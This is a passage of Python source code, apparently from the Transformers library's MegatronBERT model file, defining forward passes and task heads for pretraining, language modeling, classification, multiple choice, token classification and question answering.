attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, BaseModelOutputWithPoolingAndCrossAttentions]:
r"""
encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if self.config.is_decoder:
use_cache = use_cache if use_cache is not None else self.config.use_cache
else:
use_cache = False
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
batch_size, seq_length = input_shape
device = input_ids.device if input_ids is not None else inputs_embeds.device
# past_key_values_length
past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
if attention_mask is None:
attention_mask = torch.ones(((batch_size, seq_length + past_key_values_length)), device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape)
# If a 2D or 3D attention mask is provided for the cross-attention
# we need to make broadcastable to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids,
inputs_embeds=inputs_embeds,
past_key_values_length=past_key_values_length,
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output) if self.pooler is not None else None
if not return_dict:
return (sequence_output, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
past_key_values=encoder_outputs.past_key_values,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
cross_attentions=encoder_outputs.cross_attentions,
)
@add_start_docstrings(
"""
MegatronBert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a
`next sentence prediction (classification)` head.
""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForPreTraining(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_missing = ["cls.predictions.decoder"]
def __init__(self, config, add_binary_head=True):
super().__init__(config)
self.bert = MegatronBertModel(config)
self.cls = MegatronBertPreTrainingHeads(config)
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=MegatronBertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
next_sentence_label: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, MegatronBertForPreTrainingOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should be in `[-100, 0, ...,
config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored (masked), the
loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
next_sentence_label (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair
(see `input_ids` docstring) Indices should be in `[0, 1]`:
- 0 indicates sequence B is a continuation of sequence A,
- 1 indicates sequence B is a random sequence.
kwargs (`Dict[str, any]`, optional, defaults to *{}*):
Used to hide legacy arguments that have been deprecated.
Returns:
Example:
```python
>>> from transformers import AutoTokenizer, MegatronBertForPreTraining
>>> import torch
>>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
>>> model = MegatronBertForPreTraining.from_pretrained("nvidia/megatron-bert-cased-345m")
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.prediction_logits
>>> seq_relationship_logits = outputs.seq_relationship_logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output, pooled_output = outputs[:2]
prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)
total_loss = None
if labels is not None and next_sentence_label is not None:
loss_fct = CrossEntropyLoss()
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
total_loss = masked_lm_loss + next_sentence_loss
if not return_dict:
output = (prediction_scores, seq_relationship_score) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return MegatronBertForPreTrainingOutput(
loss=total_loss,
prediction_logits=prediction_scores,
seq_relationship_logits=seq_relationship_score,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""MegatronBert Model with a `language modeling` head on top for CLM fine-tuning.""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForCausalLM(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"cls.predictions.decoder"]
def __init__(self, config):
super().__init__(config)
if not config.is_decoder:
logger.warning("If you want to use `MegatronBertForCausalLM` as a standalone, add `is_decoder=True.`")
self.bert = MegatronBertModel(config, add_pooling_layer=False)
self.cls = MegatronBertOnlyMLMHead(config)
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
past_key_values: Optional[Tuple[Tuple[torch.Tensor]]] = None,
use_cache: Optional[bool] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, CausalLMOutputWithCrossAttentions]:
r"""
encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention if
the model is configured as a decoder.
encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used in
the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the left-to-right language modeling loss (next word prediction). Indices should be in
`[-100, 0, ..., config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are
ignored (masked), the loss is only computed for the tokens with labels n `[0, ..., config.vocab_size]`
past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
Returns:
Example:
```python
>>> from transformers import AutoTokenizer, MegatronBertForCausalLM, MegatronBertConfig
>>> import torch
>>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
>>> model = MegatronBertForCausalLM.from_pretrained("nvidia/megatron-bert-cased-345m", is_decoder=True)
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if labels is not None:
use_cache = False
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
past_key_values=past_key_values,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
lm_loss = None
if labels is not None:
# we are doing next-token prediction; shift prediction scores and input ids by one
shifted_prediction_scores = prediction_scores[:, :-1, :].contiguous()
labels = labels[:, 1:].contiguous()
loss_fct = CrossEntropyLoss()
lm_loss = loss_fct(shifted_prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((lm_loss,) + output) if lm_loss is not None else output
return CausalLMOutputWithCrossAttentions(
loss=lm_loss,
logits=prediction_scores,
past_key_values=outputs.past_key_values,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
def prepare_inputs_for_generation(self, input_ids, past_key_values=None, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
# if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly
if attention_mask is None:
attention_mask = input_ids.new_ones(input_shape)
# cut decoder_input_ids if past is used
if past_key_values is not None:
input_ids = input_ids[:, -1:]
return {"input_ids": input_ids, "attention_mask": attention_mask, "past_key_values": past_key_values}
def _reorder_cache(self, past_key_values, beam_idx):
reordered_past = ()
for layer_past in past_key_values:
reordered_past += (tuple(past_state.index_select(0, beam_idx) for past_state in layer_past),)
return reordered_past
@add_start_docstrings("""MegatronBert Model with a `language modeling` head on top.""", MEGATRON_BERT_START_DOCSTRING)
class MegatronBertForMaskedLM(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler", r"seq_relationship"]
_keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder"]
def __init__(self, config):
super().__init__(config)
if config.is_decoder:
logger.warning(
"If you want to use `MegatronBertForMaskedLM` make sure `config.is_decoder=False` for "
"bi-directional self-attention."
)
self.bert = MegatronBertModel(config, add_pooling_layer=False)
self.cls = MegatronBertOnlyMLMHead(config)
# Initialize weights and apply final processing
self.post_init()
def get_output_embeddings(self):
return self.cls.predictions.decoder
def set_output_embeddings(self, new_embeddings):
self.cls.predictions.decoder = new_embeddings
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=MaskedLMOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
encoder_hidden_states: Optional[torch.FloatTensor] = None,
encoder_attention_mask: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, MaskedLMOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss. Indices should be in `[-100, 0, ...,
config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored (masked), the
loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
prediction_scores = self.cls(sequence_output)
masked_lm_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss() # -100 index = padding token
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
if not return_dict:
output = (prediction_scores,) + outputs[2:]
return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output
return MaskedLMOutput(
loss=masked_lm_loss,
logits=prediction_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
def prepare_inputs_for_generation(self, input_ids, attention_mask=None, **model_kwargs):
input_shape = input_ids.shape
effective_batch_size = input_shape[0]
# add a dummy token
if self.config.pad_token_id is None:
raise ValueError("The PAD token should be defined for generation")
attention_mask = torch.cat([attention_mask, attention_mask.new_zeros((attention_mask.shape[0], 1))], dim=-1)
dummy_token = torch.full(
(effective_batch_size, 1), self.config.pad_token_id, dtype=torch.long, device=input_ids.device
)
input_ids = torch.cat([input_ids, dummy_token], dim=1)
return {"input_ids": input_ids, "attention_mask": attention_mask}
@add_start_docstrings(
"""MegatronBert Model with a `next sentence prediction (classification)` head on top.""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForNextSentencePrediction(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"predictions"]
def __init__(self, config):
super().__init__(config)
self.bert = MegatronBertModel(config)
self.cls = MegatronBertOnlyNSPHead(config)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=NextSentencePredictorOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
**kwargs,
) -> Union[Tuple, NextSentencePredictorOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair
(see `input_ids` docstring). Indices should be in `[0, 1]`:
- 0 indicates sequence B is a continuation of sequence A,
- 1 indicates sequence B is a random sequence.
Returns:
Example:
```python
>>> from transformers import AutoTokenizer, MegatronBertForNextSentencePrediction
>>> import torch
>>> tokenizer = AutoTokenizer.from_pretrained("nvidia/megatron-bert-cased-345m")
>>> model = MegatronBertForNextSentencePrediction.from_pretrained("nvidia/megatron-bert-cased-345m")
>>> prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
>>> next_sentence = "The sky is blue due to the shorter wavelength of blue light."
>>> encoding = tokenizer(prompt, next_sentence, return_tensors="pt")
>>> outputs = model(**encoding, labels=torch.LongTensor([1]))
>>> logits = outputs.logits
>>> assert logits[0, 0] < logits[0, 1] # next sentence was random
```"""
if "next_sentence_label" in kwargs:
warnings.warn(
"The `next_sentence_label` argument is deprecated and will be removed in a future version, use"
" `labels` instead.",
FutureWarning,
)
labels = kwargs.pop("next_sentence_label")
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
seq_relationship_scores = self.cls(pooled_output)
next_sentence_loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
next_sentence_loss = loss_fct(seq_relationship_scores.view(-1, 2), labels.view(-1))
if not return_dict:
output = (seq_relationship_scores,) + outputs[2:]
return ((next_sentence_loss,) + output) if next_sentence_loss is not None else output
return NextSentencePredictorOutput(
loss=next_sentence_loss,
logits=seq_relationship_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
MegatronBert Model transformer with a sequence classification/regression head on top (a linear layer on top of the
pooled output) e.g. for GLUE tasks.
""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForSequenceClassification(MegatronBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = MegatronBertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=SequenceClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, SequenceClassifierOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the sequence classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels == 1` a regression loss is computed (Mean-Square loss), If
`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return SequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
MegatronBert Model with a multiple choice classification head on top (a linear layer on top of the pooled output
and a softmax) e.g. for RocStories/SWAG tasks.
""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForMultipleChoice(MegatronBertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.bert = MegatronBertModel(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, 1)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(
MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=MultipleChoiceModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, MultipleChoiceModelOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the multiple choice classification loss. Indices should be in `[0, ...,
num_choices-1]` where `num_choices` is the size of the second dimension of the input tensors. (See
`input_ids` above)
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
num_choices = input_ids.shape[1] if input_ids is not None else inputs_embeds.shape[1]
input_ids = input_ids.view(-1, input_ids.size(-1)) if input_ids is not None else None
attention_mask = attention_mask.view(-1, attention_mask.size(-1)) if attention_mask is not None else None
token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1)) if token_type_ids is not None else None
position_ids = position_ids.view(-1, position_ids.size(-1)) if position_ids is not None else None
inputs_embeds = (
inputs_embeds.view(-1, inputs_embeds.size(-2), inputs_embeds.size(-1))
if inputs_embeds is not None
else None
)
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
reshaped_logits = logits.view(-1, num_choices)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(reshaped_logits, labels)
if not return_dict:
output = (reshaped_logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return MultipleChoiceModelOutput(
loss=loss,
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
MegatronBert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g.
for Named-Entity-Recognition (NER) tasks.
""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForTokenClassification(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = MegatronBertModel(config, add_pooling_layer=False)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, config.num_labels)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=TokenClassifierOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, TokenClassifierOutput]:
r"""
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
sequence_output = outputs[0]
sequence_output = self.dropout(sequence_output)
logits = self.classifier(sequence_output)
loss = None
if labels is not None:
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
if not return_dict:
output = (logits,) + outputs[2:]
return ((loss,) + output) if loss is not None else output
return TokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
MegatronBert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a
linear layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
MEGATRON_BERT_START_DOCSTRING,
)
class MegatronBertForQuestionAnswering(MegatronBertPreTrainedModel):
_keys_to_ignore_on_load_unexpected = [r"pooler"]
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.bert = MegatronBertModel(config, add_pooling_layer=False)
self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels)
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(MEGATRON_BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=QuestionAnsweringModelOutput,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids: Optional[torch.LongTensor] = None,
attention_mask: Optional[torch.FloatTensor] = None,
token_type_ids: Optional[torch.LongTensor] = None,
position_ids: Optional[torch.LongTensor] = None,
head_mask: Optional[torch.FloatTensor] = None,
inputs_embeds: Optional[torch.FloatTensor] = None,
start_positions: Optional[torch.LongTensor] = None,
end_positions: Optional[torch.LongTensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> Union[Tuple, QuestionAnsweringModelOutput]:
r"""
start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
